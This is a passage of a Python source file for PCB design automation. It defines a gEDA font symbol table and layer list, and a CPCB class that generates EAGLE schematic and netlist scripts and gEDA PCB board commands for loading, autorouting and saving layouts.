#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from edautils import *
from eda import *
pcb_symbols= """
Symbol(' ' 18)
(
)
Symbol('!' 12)
(
SymbolLine(0 35 0 40 8)
SymbolLine(0 0 0 25 8)
)
Symbol('"' 12)
(
SymbolLine(0 0 0 10 8)
SymbolLine(10 0 10 10 8)
)
Symbol('#' 12)
(
SymbolLine(0 25 20 25 8)
SymbolLine(0 15 20 15 8)
SymbolLine(15 10 15 30 8)
SymbolLine(5 10 5 30 8)
)
Symbol('$' 12)
(
SymbolLine(15 5 20 10 8)
SymbolLine(5 5 15 5 8)
SymbolLine(0 10 5 5 8)
SymbolLine(0 10 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 30 8)
SymbolLine(15 35 20 30 8)
SymbolLine(5 35 15 35 8)
SymbolLine(0 30 5 35 8)
SymbolLine(10 0 10 40 8)
)
Symbol('%' 12)
(
SymbolLine(0 5 0 10 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 10 0 8)
SymbolLine(10 0 15 5 8)
SymbolLine(15 5 15 10 8)
SymbolLine(10 15 15 10 8)
SymbolLine(5 15 10 15 8)
SymbolLine(0 10 5 15 8)
SymbolLine(0 40 40 0 8)
SymbolLine(35 40 40 35 8)
SymbolLine(40 30 40 35 8)
SymbolLine(35 25 40 30 8)
SymbolLine(30 25 35 25 8)
SymbolLine(25 30 30 25 8)
SymbolLine(25 30 25 35 8)
SymbolLine(25 35 30 40 8)
SymbolLine(30 40 35 40 8)
)
Symbol('&' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 25 15 10 8)
SymbolLine(5 40 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(0 15 25 40 8)
SymbolLine(5 0 10 0 8)
SymbolLine(10 0 15 5 8)
SymbolLine(15 5 15 10 8)
SymbolLine(0 25 0 35 8)
)
Symbol(''' 12)
(
SymbolLine(0 10 10 0 8)
)
Symbol('(' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
)
Symbol(')' 12)
(
SymbolLine(0 0 5 5 8)
SymbolLine(5 5 5 35 8)
SymbolLine(0 40 5 35 8)
)
Symbol('*' 12)
(
SymbolLine(0 10 20 30 8)
SymbolLine(0 30 20 10 8)
SymbolLine(0 20 20 20 8)
SymbolLine(10 10 10 30 8)
)
Symbol('+' 12)
(
SymbolLine(0 20 20 20 8)
SymbolLine(10 10 10 30 8)
)
Symbol(',' 12)
(
SymbolLine(0 50 10 40 8)
)
Symbol('-' 12)
(
SymbolLine(0 20 20 20 8)
)
Symbol('.' 12)
(
SymbolLine(0 40 5 40 8)
)
Symbol('/' 12)
(
SymbolLine(0 35 30 5 8)
)
Symbol('0' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 30 20 10 8)
)
Symbol('1' 12)
(
SymbolLine(5 40 15 40 8)
SymbolLine(10 0 10 40 8)
SymbolLine(0 10 10 0 8)
)
Symbol('2' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(0 40 25 15 8)
SymbolLine(0 40 25 40 8)
)
Symbol('3' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 20 20 20 8)
)
Symbol('4' 12)
(
SymbolLine(0 20 20 0 8)
SymbolLine(0 20 25 20 8)
SymbolLine(20 0 20 40 8)
)
Symbol('5' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(0 0 0 20 8)
SymbolLine(0 20 5 15 8)
SymbolLine(5 15 15 15 8)
SymbolLine(15 15 20 20 8)
SymbolLine(20 20 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('6' 12)
(
SymbolLine(15 0 20 5 8)
SymbolLine(5 0 15 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(15 20 20 25 8)
SymbolLine(0 20 15 20 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 25 20 35 8)
)
Symbol('7' 12)
(
SymbolLine(0 40 25 15 8)
SymbolLine(25 0 25 15 8)
SymbolLine(0 0 25 0 8)
)
Symbol('8' 12)
(
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 15 5 20 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 15 8)
SymbolLine(15 20 20 15 8)
)
Symbol('9' 12)
(
SymbolLine(0 40 20 20 8)
SymbolLine(20 5 20 20 8)
SymbolLine(15 0 20 5 8)
SymbolLine(5 0 15 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 20 20 8)
)
Symbol(':' 12)
(
SymbolLine(0 15 5 15 8)
SymbolLine(0 25 5 25 8)
)
Symbol(';' 12)
(
SymbolLine(0 40 10 30 8)
SymbolLine(10 15 10 20 8)
)
Symbol('<' 12)
(
SymbolLine(0 20 10 10 8)
SymbolLine(0 20 10 30 8)
)
Symbol('=' 12)
(
SymbolLine(0 15 20 15 8)
SymbolLine(0 25 20 25 8)
)
Symbol('>' 12)
(
SymbolLine(0 10 10 20 8)
SymbolLine(0 30 10 20 8)
)
Symbol('?' 12)
(
SymbolLine(10 20 10 25 8)
SymbolLine(10 35 10 40 8)
SymbolLine(0 5 0 10 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 10 8)
SymbolLine(10 20 20 10 8)
)
Symbol('A' 12)
(
SymbolLine(0 5 0 40 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 40 8)
SymbolLine(0 20 25 20 8)
)
Symbol('B' 12)
(
SymbolLine(0 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 20 25 25 8)
SymbolLine(5 20 20 20 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
)
Symbol('C' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 20 0 8)
)
Symbol('D' 12)
(
SymbolLine(5 0 5 40 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(0 40 20 40 8)
SymbolLine(0 0 20 0 8)
)
Symbol('E' 12)
(
SymbolLine(0 20 15 20 8)
SymbolLine(0 40 20 40 8)
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 20 0 8)
)
Symbol('F' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(0 20 15 20 8)
)
Symbol('G' 12)
(
SymbolLine(20 0 25 5 8)
SymbolLine(5 0 20 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 20 25 25 8)
SymbolLine(10 20 20 20 8)
)
Symbol('H' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(25 0 25 40 8)
SymbolLine(0 20 25 20 8)
)
Symbol('I' 12)
(
SymbolLine(0 0 10 0 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 40 10 40 8)
)
Symbol('J' 12)
(
SymbolLine(0 0 15 0 8)
SymbolLine(15 0 15 35 8)
SymbolLine(10 40 15 35 8)
SymbolLine(5 40 10 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('K' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 20 20 0 8)
SymbolLine(0 20 20 40 8)
)
Symbol('L' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 20 40 8)
)
Symbol('M' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 15 15 8)
SymbolLine(15 15 30 0 8)
SymbolLine(30 0 30 40 8)
)
Symbol('N' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 25 30 8)
SymbolLine(25 0 25 40 8)
)
Symbol('O' 12)
(
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('P' 12)
(
SymbolLine(5 0 5 40 8)
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
SymbolLine(5 20 20 20 8)
)
Symbol('Q' 12)
(
SymbolLine(0 5 0 35 8)
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 15 0 8)
SymbolLine(15 0 20 5 8)
SymbolLine(20 5 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(10 30 20 40 8)
)
Symbol('R' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(20 0 25 5 8)
SymbolLine(25 5 25 15 8)
SymbolLine(20 20 25 15 8)
SymbolLine(5 20 20 20 8)
SymbolLine(5 0 5 40 8)
SymbolLine(5 20 25 40 8)
)
Symbol('S' 12)
(
SymbolLine(20 0 25 5 8)
SymbolLine(5 0 20 0 8)
SymbolLine(0 5 5 0 8)
SymbolLine(0 5 0 15 8)
SymbolLine(0 15 5 20 8)
SymbolLine(5 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('T' 12)
(
SymbolLine(0 0 20 0 8)
SymbolLine(10 0 10 40 8)
)
Symbol('U' 12)
(
SymbolLine(0 0 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 0 20 35 8)
)
Symbol('V' 12)
(
SymbolLine(0 0 0 30 8)
SymbolLine(0 30 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(20 0 20 30 8)
)
Symbol('W' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 15 25 8)
SymbolLine(15 25 30 40 8)
SymbolLine(30 0 30 40 8)
)
Symbol('X' 12)
(
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 25 30 8)
SymbolLine(25 30 25 40 8)
SymbolLine(0 30 0 40 8)
SymbolLine(0 30 25 5 8)
SymbolLine(25 0 25 5 8)
)
Symbol('Y' 12)
(
SymbolLine(0 0 0 5 8)
SymbolLine(0 5 10 15 8)
SymbolLine(10 15 20 5 8)
SymbolLine(20 0 20 5 8)
SymbolLine(10 15 10 40 8)
)
Symbol('Z' 12)
(
SymbolLine(0 0 25 0 8)
SymbolLine(25 0 25 5 8)
SymbolLine(0 30 25 5 8)
SymbolLine(0 30 0 40 8)
SymbolLine(0 40 25 40 8)
)
Symbol('[' 12)
(
SymbolLine(0 0 5 0 8)
SymbolLine(0 0 0 40 8)
SymbolLine(0 40 5 40 8)
)
Symbol('\' 12)
(
SymbolLine(0 5 30 35 8)
)
Symbol(']' 12)
(
SymbolLine(0 0 5 0 8)
SymbolLine(5 0 5 40 8)
SymbolLine(0 40 5 40 8)
)
Symbol('^' 12)
(
SymbolLine(0 5 5 0 8)
SymbolLine(5 0 10 5 8)
)
Symbol('_' 12)
(
SymbolLine(0 40 20 40 8)
)
Symbol('a' 12)
(
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(20 20 20 35 8)
SymbolLine(20 35 25 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('b' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
)
Symbol('c' 12)
(
SymbolLine(5 20 20 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 20 40 8)
)
Symbol('d' 12)
(
SymbolLine(20 0 20 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
)
Symbol('e' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(0 35 5 40 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(0 30 20 30 8)
SymbolLine(20 30 20 25 8)
)
Symbol('f' 10)
(
SymbolLine(5 5 5 40 8)
SymbolLine(5 5 10 0 8)
SymbolLine(10 0 15 0 8)
SymbolLine(0 20 10 20 8)
)
Symbol('g' 12)
(
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(0 50 5 55 8)
SymbolLine(5 55 15 55 8)
SymbolLine(15 55 20 50 8)
SymbolLine(20 20 20 50 8)
)
Symbol('h' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
)
Symbol('i' 10)
(
SymbolLine(0 10 0 15 8)
SymbolLine(0 25 0 40 8)
)
Symbol('j' 10)
(
SymbolLine(5 10 5 15 8)
SymbolLine(5 25 5 50 8)
SymbolLine(0 55 5 50 8)
)
Symbol('k' 12)
(
SymbolLine(0 0 0 40 8)
SymbolLine(0 25 15 40 8)
SymbolLine(0 25 10 15 8)
)
Symbol('l' 10)
(
SymbolLine(0 0 0 35 8)
SymbolLine(0 35 5 40 8)
)
Symbol('m' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
SymbolLine(20 25 25 20 8)
SymbolLine(25 20 30 20 8)
SymbolLine(30 20 35 25 8)
SymbolLine(35 25 35 40 8)
SymbolLine(0 20 5 25 8)
)
Symbol('n' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 40 8)
SymbolLine(0 20 5 25 8)
)
Symbol('o' 12)
(
SymbolLine(0 25 0 35 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 15 20 8)
SymbolLine(15 20 20 25 8)
SymbolLine(20 25 20 35 8)
SymbolLine(15 40 20 35 8)
SymbolLine(5 40 15 40 8)
SymbolLine(0 35 5 40 8)
)
Symbol('p' 12)
(
SymbolLine(5 25 5 55 8)
SymbolLine(0 20 5 25 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(25 25 25 35 8)
SymbolLine(20 40 25 35 8)
SymbolLine(10 40 20 40 8)
SymbolLine(5 35 10 40 8)
)
Symbol('q' 12)
(
SymbolLine(20 25 20 55 8)
SymbolLine(15 20 20 25 8)
SymbolLine(5 20 15 20 8)
SymbolLine(0 25 5 20 8)
SymbolLine(0 25 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('r' 12)
(
SymbolLine(5 25 5 40 8)
SymbolLine(5 25 10 20 8)
SymbolLine(10 20 20 20 8)
SymbolLine(0 20 5 25 8)
)
Symbol('s' 12)
(
SymbolLine(5 40 20 40 8)
SymbolLine(20 40 25 35 8)
SymbolLine(20 30 25 35 8)
SymbolLine(5 30 20 30 8)
SymbolLine(0 25 5 30 8)
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 20 20 8)
SymbolLine(20 20 25 25 8)
SymbolLine(0 35 5 40 8)
)
Symbol('t' 10)
(
SymbolLine(5 0 5 35 8)
SymbolLine(5 35 10 40 8)
SymbolLine(0 15 10 15 8)
)
Symbol('u' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
SymbolLine(20 20 20 35 8)
)
Symbol('v' 12)
(
SymbolLine(0 20 0 30 8)
SymbolLine(0 30 10 40 8)
SymbolLine(10 40 20 30 8)
SymbolLine(20 20 20 30 8)
)
Symbol('w' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(5 40 10 40 8)
SymbolLine(10 40 15 35 8)
SymbolLine(15 20 15 35 8)
SymbolLine(15 35 20 40 8)
SymbolLine(20 40 25 40 8)
SymbolLine(25 40 30 35 8)
SymbolLine(30 20 30 35 8)
)
Symbol('x' 12)
(
SymbolLine(0 20 20 40 8)
SymbolLine(0 40 20 20 8)
)
Symbol('y' 12)
(
SymbolLine(0 20 0 35 8)
SymbolLine(0 35 5 40 8)
SymbolLine(20 20 20 50 8)
SymbolLine(15 55 20 50 8)
SymbolLine(5 55 15 55 8)
SymbolLine(0 50 5 55 8)
SymbolLine(5 40 15 40 8)
SymbolLine(15 40 20 35 8)
)
Symbol('z' 12)
(
SymbolLine(0 20 20 20 8)
SymbolLine(0 40 20 20 8)
SymbolLine(0 40 20 40 8)
)
Symbol('{' 12)
(
SymbolLine(5 5 10 0 8)
SymbolLine(5 5 5 15 8)
SymbolLine(0 20 5 15 8)
SymbolLine(0 20 5 25 8)
SymbolLine(5 25 5 35 8)
SymbolLine(5 35 10 40 8)
)
Symbol('|' 12)
(
SymbolLine(0 0 0 40 8)
)
Symbol('}' 12)
(
SymbolLine(0 0 5 5 8)
SymbolLine(5 5 5 15 8)
SymbolLine(5 15 10 20 8)
SymbolLine(5 25 10 20 8)
SymbolLine(5 25 5 35 8)
SymbolLine(0 40 5 35 8)
)
Symbol('~' 12)
(
SymbolLine(0 25 5 20 8)
SymbolLine(5 20 10 20 8)
SymbolLine(10 20 15 25 8)
SymbolLine(15 25 20 25 8)
SymbolLine(20 25 25 20 8)
)
"""
pcb_layers = """
Layer(1 "solder")
(
)
Layer(2 "component")
(
)
Layer(3 "GND")
(
)
Layer(4 "power")
(
)
Layer(5 "signal1")
(
)
Layer(6 "signal2")
(
)
Layer(7 "unused")
(
)
Layer(8 "unused")
(
)
Layer(9 "silk")
(
)
Layer(10 "silk")
(
)
"""
class CPCB:
" PCB class "
def __init__(self, sch=None,brd=None):
self.name=""
self.sch=sch
self.brd=brd
self.script_path=""
def addLayers(self):
# These layers have to be added in the board
# self.brd.addLayer(CLayer("solder",1)) # bottom orientation
# self.brd.addLayer(CLayer("component",2))
# these layers are already added
## self.brd.addLayer(CLayer("GND",3))
## self.brd.addLayer(CLayer("VCC",4))
## self.brd.addLayer(CLayer("blksolder",5)) # bottom orientation
## self.brd.addLayer(CLayer("blkcomponent",6))
## self.brd.addLayer(CLayer("signal3",7))
## self.brd.addLayer(CLayer("signal4",8))
## self.brd.addLayer(CLayer("Vias",9))
## self.brd.addLayer(CLayer("silk",10))
pass
#Layer(1 "solder")
#(
# Line(1375 1075 1325 1025 40 30 0x00000020)
#)
# gen sch layers scr"
def genSchLayersScr(self):
ns = ''
CRLF = "\n"
ns = pcb_layers;
return ns;
#ADD 'C1' 'G$1' POLARISED_CASE_H@ipc-7351-capacitor R0.000 (-0.300 3.300);
#ADD 'Q1' 'G$1' -PNP-SOT23-EBC@transistor R0.000 (1.600 3.300);
#ADD 'Q5' 'G$1' MMBT2222ALT1-NPN-SOT23-BEC@transistor R0.000 (0.900 2.800);
#ADD 'V1' 'GND' GND@supply2 R0.000 (0.600 0.100);
#ADD 'V2' 'G$1' VCC@supply2 R0.000 (5.600 4.200);
# gen sch add scr"
def genSchAddScr(self):
ns = ''
CRLF = "\n"
ns += "GRID INCH 0.005" + CRLF
ns += "Layer (91 Nets;" + CRLF
ns += "Layer (92 Busses;" + CRLF
ns += "Layer (93 Pins;" + CRLF
ns += "Layer (94 Symbols;" + CRLF
ns += "Layer (95 Names;" + CRLF
ns += "Layer (96 Values;" + CRLF
ns += "Layer (250 Descript;" + CRLF
ns += "Layer (251 SMDround;" + CRLF
ns += "DISPLAY -PINS" + CRLF
ns += CRLF
ns += "EDIT .S1" + CRLF
ns += "SET WIRE_BEND 2;" + CRLF
ns += "CHANGE STYLE 'Continuous'" + CRLF
for dev in self.sch.devices:
ns += "ADD '" + str(dev.refid) + "' 'G$1' " + str(dev.name) + "@" + str(dev.libname) + " " + dev.orientation + "R%.3f"% (dev.rotation) +" (" + str(dev.position) + ");" + CRLF
ns += "GRID LAST" + CRLF
return ns
# gen cmd sch net-connect"
def genSchNetConnectScr(self):
ns = ''
CRLF = "\n"
runcmd="run " + self.script_path + "/sch-net-connect.ulp"
for net in self.sch.nets.values:
prevdev=""
prevpin=""
l = ""
first = 1
for node in net.nodes:
if first:
first = 0
prevdev=str(node.dev.refid)
prevpin=str(node.pin)
else:
l = runcmd + " " + net.name + " " + prevdev + " " + prevpin + " " + str(node.dev.refid) + " " + str(node.pin) + ";" + CRLF
ns += l
prevdev=str(node.dev.refid)
prevpin=str(node.pin)
# string function
return ns
# gen sch netlist listing
def genSchNetlistLst(self):
ns = ''
CRLF = '\n'
for net in self.sch.nets.values():
name = net.name
ns += net.name + ' '
for node in net.nodes:
ns += str(node.dev.refid) + '-' + str(node.pin.num) + ' '
ns += CRLF
ns += CRLF #extra one
# string function
return ns
# gen sch netlist script
def genSchNetlistScr(self):
ns = ''
CRLF = "\n"
ns = "# Netlist script" + CRLF
ns += "# EAGLE Version 4.11" + CRLF
ns += "# Copyright Hobby-Robotics" + CRLF
ns += expandtab("#Net\tPart\tPad",12) + CRLF
ns += CRLF
for net in self.sch.nets.values():
ns += CRLF
ns += "Change Class 0;" + CRLF
l = "Signal " + " '" + net.name + "'"
first = 1
for node in net.nodes:
if first:
first = 0
l += "\t'"
else:
l += "\t\t"
l += str(node.dev.refid) + "'\t'" + str(node.pin) + "' \\" + CRLF
ns += expandtab(str(l),12)
ns += "\t\t\t;" + CRLF
# string function
return ns
# Select
# {"All objects" Select(ObjectByName) ActiveWhen(have_regex)}
# {"Elements" Select(ElementByName) ActiveWhen(have_regex)}
# {"Pads" Select(PadByName) ActiveWhen(have_regex)}
# {"Pins" Select(PinByName) ActiveWhen(have_regex)}
# {"Text" Select(TextByName) ActiveWhen(have_regex)}
# {"Vias" Select(ViaByName) ActiveWhen(have_regex)}
# Move
# {"Move selected elements to other side" Flip(SelectedElements) a={"Shift-B" "Shift<Key>b"}}
# {"Remove selected objects" RemoveSelected()}
# {Connects m=C
# {"Lookup connection to object" GetXY(Select the object) Connection(Find) a={"Ctrl-F" "Ctrl<Key>f"}}
# {"Reset scanned pads/pins/vias" Connection(ResetPinsViasAndPads) Display(Redraw)}
# {"Reset scanned lines/polygons" Connection(ResetLinesAndPolygons) Display(Redraw)}
# {"Reset all connections" Connection(Reset) Display(Redraw) a={"Shift-F" "Shift<Key>f"}}
# {"Optimize rats nest" Atomic(Save) DeleteRats(AllRats)
# Atomic(Restore) AddRats(AllRats) Atomic(Block) a={"O" "<Key>o"}}
# {"Erase rats nest" DeleteRats(AllRats) a={"E" "<Key>e"}}
# {"Erase selected rats" DeleteRats(SelectedRats) a={"Shift-E" "Shift<Key>e"}}
#
# {"Auto-route selected rats" AutoRoute(Selected)}
# {"Auto-route all rats" AutoRoute(AllRats)}
# {"Rip up all auto-routed tracks" RipUp(All)}
# {"Optimize routed tracks"
# {"Auto-Optimize" djopt(auto) a={"Shift-=" "Shift<Key>="}}
# {"Debumpify" djopt(debumpify) }
# {"Unjaggy" djopt(unjaggy) }
# {"Vianudge" djopt(vianudge) }
# {"Viatrim" djopt(viatrim) }
# {"Ortho pull" djopt(orthopull) }
# {"Simple optimization" djopt(simple) a={"=" "<Key>="}}
# {"Miter" djopt(miter) }
# {"Puller" a={"Y" "<Key>y"} Puller() }
#
# {"Only autorouted nets" OptAutoOnly() checked=optautoonly}
# }
# {"Design Rule Checker" DRC()}
# {"Apply vendor drill mapping" ApplyVendor()}
# }
def genBrdPlaceBottom(self):
ns = ''
#Select(ElementByName|ObjectByName|PadByName|PinByName)
for dev in self.brd.devices.values():
name = str(dev.refid)
if dev.bottom:
#Select(ElementByName) ActiveWhen(have_regex)
ns += 'Select(ElementByName) ActiveWhen( ' + name + ' )\n'
ns += 'Flip(SelectedElements)\n'
ns += 'Unselect(All)\n'
return ns
# gen brd cmd scr"
def genBrdCmdScr(self):
ns = ''
CRLF = "\n"
ns += "# Gen EDA generated" + CRLF
ns += "# date:" + CRLF # version
ns += "# user:" + CRLF # version
# LoadFrom(Layout|LayoutToBuffer|ElementToBuffer|Netlist|Revert,filename)
ns += 'LoadFrom( Layout, ' + self.script_path + '/' + self.brd.name + '.pcb )' + CRLF # layout
ns += 'LoadFrom( Netlist, ' + self.script_path + '/' + self.brd.name + '.net )' + CRLF # netlist
# Do not do that, do it in the placement
# ns += self.genBrdPlaceBottom()
# AddRats(AllRats|SelectedRats|Close)
ns += 'AddRats(AllRats)' + CRLF # add all rats
# AutoRoute(AllRats|SelectedRats)
ns += 'AutoRoute(AllRats)' + CRLF # route all rats
# Auto-Optimize djopt(auto)
ns += 'djopt(auto)' + CRLF # optimize all routes
# SaveTo(Layout|LayoutAs,filename)
ns += 'SaveTo( LayoutAs, ' + self.script_path + '/' + self.brd.name + '.brd )' + CRLF # board
ns += 'Quit( )' + CRLF # Quit
return ns
#####################################
## release: pcb 1.7.1.ALPHA
## date: Sun Jul 22 15:22:22 2001
## user: tp (Terry Porter,,,)
## host: gronk.porter.net
#PCB("" 6047 4000)
#
#Grid(25 0 0 0)
#Cursor(400 0 2)
#Flags(0x000000c0)
#Groups("1,s:2,c:3:4:5:6:7:8")
#Styles("Signal,10,40,20:Power,25,60,35:Fat,40,60,35:Skinny,8,36,20")
####################################
# release: pcb 1.99v
# date: Tue May 1 07:59:48 2007
# user: pawel (pawel,U-WODNICKI\pawel,S-1-5-21-1835012242-1811546175-1750076985-1007)
# host: Wodnicki
#
#FileVersion[20070407]
#
#PCB["" 350000 330000]
#
#Grid[3937.007904 1800 100 1]
#Cursor[133000 107500 2.000000]
#PolyArea[200000000.000000]
#Thermal[0.500000]
#DRC[1000 1000 1000 1000 1500 1000]
#Flags("rubberband,nameonpcb,alldirection,uniquename,snappin")
#Groups("4,5,6,c:1,2,3,s:8:7")
#Styles["Signal,1000,4000,2000,1000:Power,2500,6000,3500,1000:Fat,4000,6000,3500,1000:Skinny,800,3600,2000,1000"]
# gen brd board scr"
def genBrdBoardScr(self):
ns = ''
CRLF = "\n"
ns += "# boostEDA generated" + CRLF
ns += "# date:" + CRLF # version
ns += "# user:" + CRLF # version
# determine board size, aka outline for rectangular ones only
self.brd.outline.calcBBox()
xsize = self.brd.outline.bbox.sizeX()
ysize = self.brd.outline.bbox.sizeY()
ns += "PCB[\"" + self.brd.name + "\" "
ns += "%d "% (xsize) # x size
ns += " %d"% (ysize) # y size
ns += "]" + CRLF
ns += "Grid(25 0 0 0)" + CRLF
ns += "Cursor(400 0 2)" + CRLF
ns += "Flags(0x000000c0)" + CRLF
ns += "Groups(\"1,s:2,c:3:4:5:6:7:8\")" + CRLF
ns += "Styles(\"Signal,10,40,20:Power,25,60,35:Fat,40,60,35:Skinny,8,36,20\")" + CRLF
return ns
#Layer(1 "solder")
#(
# Line(1375 1075 1325 1025 40 30 0x00000020)
#)
def genBrdLayerFromNet(self,layer,net):
ns = ''
# Should come from board technology
### print "out net " + net.name
### print "layer num " + str(layer.num)
for line in net.route:
#print "found line on net layer num " + str(line.layernum)
if line.layernum == layer.num:
### print "out line on net " + net.name
